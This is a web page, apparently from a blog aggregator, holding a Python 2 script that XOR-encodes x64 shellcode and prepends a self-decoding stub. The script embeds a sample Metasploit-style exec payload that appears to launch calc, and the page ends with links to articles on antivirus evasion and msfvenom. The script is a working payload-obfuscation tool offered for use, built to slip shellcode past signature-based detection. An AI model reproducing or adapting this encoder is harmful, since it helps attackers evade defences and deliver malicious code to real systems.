x64 QWORD Xor shellcode encoder
#!/usr/bin/env python
#Filename: Xor_QWORD_x64.py
#coding=utf-8 import re
import sys
import random
import struct class QWORDXorEncoder: def __init__(self):
self.name = "x64 QWORD Xor Encoder"
self.description = "x64 QWORD Xor shellcode encoder"
self.author = "Danny__Wei"
self.bad_chars = []
self.bad_keys = [[] for i in range(8)]
self.good_keys = [[] for i in range(8)]
self.final_keys = []
self.shellcode = ""
self.encoded_shellcode = ""
self.encoded_payload_length = 0
self.encoder_bad_chars = ["48", "31", "c9", "81", "e9", "8d", "05", "bb", "58", "27", "2d", "f8", "ff", "e2", "f4"]
self.misc_comments = """
#This is the decoder stub
"\x48\x31\xC9" + # xor rcx, rcx
"\x48\x81\xE9" + block_count + # sub ecx, block_count
"\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rel 0x0]
"\x48\xBBXXXXXXXX" + # mov rbx, 0x????????????????
"\x48\x31\x58\x27" + # xor [rax+0x27], rbx
"\x48\x2D\xF8\xFF\xFF\xFF" + # sub rax, -8
"\xE2\xF4" # loop 0x1B
"""
def all_the_stats(self):
print "\n[Output] Encoder Name:\n" + self.name
string_bad_chars = ''
for bchar in self.bad_chars:
string_bad_chars += hex(bchar) + " "
print "\n[Output] Bad Character(s):\n" + string_bad_chars
print "\n[Output] Shellcode length:\n" + str(self.encoded_payload_length)
j = 1;
key = 0
for i in self.final_keys:
key += i * j
j *= 0x100
print ('\n[Output] Xor Key:\n%08X' % key) def shellcode_to_bin(self):
hFile = file('Xor_x64_encoded.bin', 'wb+')
hFile.write(self.encoded_shellcode)
hFile.close()
return def set_shellcode(self, shellcode):
shellcode = shellcode.decode('string-escape')
self.shellcode = bytearray(shellcode)
return # This function was copied from Justin Warner (@sixdub)
def set_bad_characters(self, bad_characters):
final_bad_chars = []
bad_characters = bad_characters.split('x') # Do some validation on the received characters
for item in bad_characters:
if item == '':
pass
elif item in self.encoder_bad_chars:
print "\n[Error] Encoder Error: Bad character specified is used for the decoder stub."
print "[Error] Encoder Error: Please use different bad characters or another encoder!"
sys.exit()
else:
if len(item) == 2:
# Thanks rohan (@cptjesus) for providing this regex code, and making me too lazt
# to do it myself
rohan_re_code = re.compile('[a-f0-9]{2}',flags=re.IGNORECASE)
if rohan_re_code.match(item):
final_bad_chars.append(item)
else:
print "\n[Error] Bad Character Error: Invalid bad character detected."
print "[Error] Bad Character Error: Please provide bad characters in \\x00\\x01... format."
sys.exit()
else:
print "\n[Error] Bad Character Error: Invalid bad character detected."
print "[Error] Bad Character Error: Please provide bad characters in \\x00\\x01... format."
sys.exit()
for x in final_bad_chars:
self.bad_chars.append(int("0x"+x,16))
return def find_bad_keys(self):
for key in range(0x100):
for bad in self.bad_chars:
char = key ^ bad
for count in xrange(8):
for i in xrange(count, len(self.shellcode), 8):
if char == self.shellcode[i]:
self.bad_keys[count].append(key)
break
return def find_key(self):
for count in xrange(8):
for key in range(0x100):
if key not in self.bad_keys[count]:
self.good_keys[count].append(key) for count in xrange(8):
if len(self.good_keys[count]) == 0:
print "\n[Error] Encoder Error: Can't find available keys."
print "[Error] Encoder Error: Please use different bad characters or another encoder!"
sys.exit()
i = random.randint(0, len(self.good_keys[count]))
self.final_keys.append(self.good_keys[count][i]) return def decoder_stub(self):
block_count = -( ( (len(self.shellcode) - 1) / 8) + 1)
str = struct.pack('<l', block_count) decoder = "\x48\x31\xC9" + "\x48\x81\xE9" + str + "\x48\x8D\x05\xEF\xFF\xFF\xFF" + "\x48\xBBXXXXXXXX" + "\x48\x31\x58\x27" + "\x48\x2D\xF8\xFF\xFF\xFF" + "\xE2\xF4" '''
decoder = "\x48\x31\xC9" + # xor rcx, rcx
"\x48\x81\xE9" + block_count + # sub ecx, block_count
"\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rel 0x0]
"\x48\xBBXXXXXXXX" + # mov rbx, 0x????????????????
"\x48\x31\x58\x27" + # xor [rax+0x27], rbx
"\x48\x2D\xF8\xFF\xFF\xFF" + # sub rax, -8
"\xE2\xF4" # loop 0x1B
''' return decoder def do_encode(self):
stub = self.decoder_stub() key = 0
str = ''
for key in self.final_keys:
str += struct.pack('B', key) stub = stub.replace('XXXXXXXX', str) # check out the final decoder stub
for byte in bytearray(stub):
if byte in self.bad_chars:
print "\n[Error] Encoder Error: Bad character specified is used for the decoder stub."
print "[Error] Encoder Error: Please use different bad characters or another encoder!"
sys.exit() stub = bytearray(stub) mod = 0
byte = 0
count = 0
for byte in bytearray(self.shellcode):
if count < 8:
mod = count
else:
mod = count % 8
count += 1
enbyte = byte ^ self.final_keys[mod]
stub.append(enbyte) self.encoded_shellcode = stub
self.encoded_payload_length = len(stub) return def encode(self):
self.find_bad_keys()
self.find_key()
self.do_encode() if __name__ == '__main__':
shellcode = (
"\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51"
"\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52"
"\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0"
"\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED"
"\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x8B\x80\x88"
"\x00\x00\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44"
"\x8B\x40\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48"
"\x01\xD6\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1"
"\x38\xE0\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44"
"\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49"
"\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A"
"\x41\x58\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41"
"\x59\x5A\x48\x8B\x12\xE9\x57\xFF\xFF\xFF\x5D\x48\xBA\x01\x00\x00"
"\x00\x00\x00\x00\x00\x48\x8D\x8D\x01\x01\x00\x00\x41\xBA\x31\x8B"
"\x6F\x87\xFF\xD5\xBB\xF0\xB5\xA2\x56\x41\xBA\xA6\x95\xBD\x9D\xFF"
"\xD5\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47"
"\x13\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5\x63\x61\x6C\x63\x00")
shell = QWORDXorEncoder()
shell.set_shellcode(shellcode)
shell.set_bad_characters('x00x0a')
shell.encode()
shell.all_the_stats()
shell.shellcode_to_bin() else:
pass
x64 QWORD Xor shellcode encoder的更多相关文章
- 那些shellcode免杀总结
首发先知: https://xz.aliyun.com/t/7170 自己还是想把一些shellcode免杀的技巧通过白话文.傻瓜式的文章把技巧讲清楚.希望更多和我一样web狗也能动手做到免杀的实现. ...
- 【Python】使用Python将Shellcode转换成汇编
1.介绍 需要多少行代码转换hex成反汇编呢? 多亏了Python的Capstone库,做这件事只需要五行. 在二进制分析中,进行Exploit开发或逆向工程时,需要快速将十六进制的Shellcode ...
- metasploit模块功能介绍
metasploit的模块构成及功能分析 转载自----http://forum.cnsec.org/thread-94704-1-1.html 今天我们介绍一下metasploit的基础架构和 市 ...
- Metasploit是一款开源的安全漏洞检测工具,
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,适合于需要核实漏洞的安全专家,同时也适合于强大进攻能力的 ...
- Meterpreter命令详解
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以 ...
- 【译】msfvenom
原文链接:MSFvenom 1.使用MSFvenom命令行界面 msfvenom是Msfpayload和Msfencode的组合,将这两个工具集成在一个框架实例中. msfvenom的优点是: 一个单 ...
- 服务器中了蠕虫病毒Wannamine2.0小记
近期用户反馈某台服务器总感觉性能不是很好存在卡顿,于是今天远程上去分析. 打开任务管理器发现CPU使用率非常低,内存使用也在接受范围内(10/64G).不过我有一个偏好就是不喜欢用系统自带的任务管理器 ...
- 一步一步pwn路由器之wr940栈溢出漏洞分析与利用
前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 这个是最近爆出来的漏洞,漏洞编号:CVE-2017-13772 固 ...
- 20164305 徐广皓 Exp3 免杀原理与实践
免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 使用msf编码器生 ...
随机推荐
- java NIO学前准备
之前一直对NIO感兴趣,无奈对IO的很多概念很模糊,所以对于NIO的学习也是一直半解,最近在网上查阅了很多资料,发现有很多概念是需要反复理解的,有的时候甚至当时理解了,但一段时间后又忘记了,所以决定自 ...
- MySQL多表更新
多表更新:参照另外的表来更新本表的内容 table_reference {[inner | cross] join | {left | right} [outer] join} 内连接.左外连接.右 ...
- 我的Python升级打怪之路【七】:网络编程
Socket网络套接字 socket通常也称为"套接字",用于描述IP地址和端口,是一个通信链的句柄.应用程序通常通过”套接字“向网络发出请求或者应答网络请求. socket起源于 ...
- Robot Framework自动化测试三(selenium API)
Robot Framework Selenium API 说明: 此文档只是将最常用的UI 操作列出.更多方法请查找selenium2Library 关键字库. 一.浏览器驱动 通过不同的浏览器 ...
- 阿里云CentOS环境下tomcat启动超级慢的解决方案
1 为什么会出现这个问题 Tomcat在本地服务器跑,一切都正常,但部署到阿里云上,发现启动巨慢. 经过在网上搜索,找到了原因: Tomcat 7/8都使用org.apache.catalina.ut ...
- 读写锁--ReentrantReadWriteLock
读写锁,对于读操作来说是共享锁,对于写操作来说是排他锁,两种操作都可重入的一种锁.底层也是用AQS来实现的,我们来看一下它的结构跟代码: ------------------------------- ...
- C 标准库 - string.h之strcpy使用
strcpy Copies the C string pointed by source into the array pointed by destination, including the te ...
- resteasy上传单个文件/多个文件到阿里云服务器
代码如下: ExcelServerController.java package com.xgt.controller; import com.xgt.bean.bs.ExcelBean; impor ...
- Freemarker 最简单的例子程序
首先导入包,freemarker.jar 下载地址: freemarker-2.3.18.tar.gz http://cdnetworks-kr-1.dl.sourceforge.net/pro ...
- wxss无法调用本地资源图片
微信小程序中,wxss中不能调用本地资源图片作为背景图片,奇怪的是在微信开发者工具中可以调用,但是到了真机预览的时候发现并不行,有的电脑上的连微信开发者工具里也不可以调用. 原因在于小程序上传的是代码 ...